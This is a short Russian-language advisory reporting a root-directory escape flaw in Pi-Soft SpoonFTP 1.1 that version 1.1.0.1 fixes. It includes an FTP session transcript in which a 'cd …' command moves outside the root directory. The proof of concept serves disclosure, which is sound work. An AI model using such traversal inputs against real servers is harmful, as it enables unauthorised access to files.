Выход за пределы рут директории в Pi-Soft SpoonFTP 1.1

В Pi-Soft SpoonFTP 1.1 существует уязвимость, позволяющая выйти за пределы рут директории. Для решения был выпущен
релиз Pi-Soft SpoonFTP 1.1.0.1, в котором эта проблема исправлена.

ftp localhost
Connected to xxxxxxxx.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 «/» is current directory.
ftp> cd …
250 CWD command successful.
ftp> pwd
257 «/…» is current directory.
ftp



Оставить мнение